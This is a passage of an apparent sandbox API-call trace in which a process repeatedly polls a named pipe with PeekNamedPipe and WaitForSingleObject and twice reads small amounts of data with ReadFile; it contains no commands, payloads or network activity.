lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.454] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.482] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.482] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.514] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.514] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.544] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.544] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.577] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.577] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.606] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.606] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.639] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.639] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.679] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.680] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.701] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.701] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.732] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.732] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.763] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.764] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.794] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.794] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.839] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.840] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.856] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.856] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.888] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.888] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.919] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.919] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.951] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.951] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.981] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.981] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.013] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.013] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.044] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.044] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.076] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.076] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.106] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.106] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.138] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.138] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.169] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.169] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.200] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.200] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.230] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.230] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.262] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.263] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.294] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.294] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.325] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.325] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.374] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.384] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.402] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.402] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.433] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.433] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.464] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.465] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.495] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.496] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.527] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.527] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.559] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.559] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.667] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.667] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.713] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.713] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.729] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x33, lpBytesLeftThisMessage=0x0) returned 1 [0124.730] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x33, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x33, lpOverlapped=0x0) returned 1 [0124.730] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.772] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.772] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.793] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.793] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.823] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x3f, lpBytesLeftThisMessage=0x0) returned 1 [0124.823] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x3f, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x3f, lpOverlapped=0x0) returned 1 [0124.823] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0124.855] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0124.855] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0125.276] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.276] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0125.307] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.307] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0125.416] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.416] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0125.482] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.482] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0125.857] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0125.858] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0126.140] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0126.140] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0127.108] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0127.108] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0127.648] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0127.648] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0127.914] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0127.914] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0130.415] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0130.415] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0130.551] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0130.551] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0130.579] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0130.580] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0130.907] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0130.907] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0131.068] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0131.069] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0131.203] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0131.203] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0131.496] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0131.496] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0131.519] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0131.519] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0132.592] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0132.592] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0132.623] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0132.623] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0132.727] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0132.727] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0132.774] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0132.775] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0132.795] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0132.795] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0132.911] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0132.911] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.325] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.325] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.357] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.357] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.389] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, 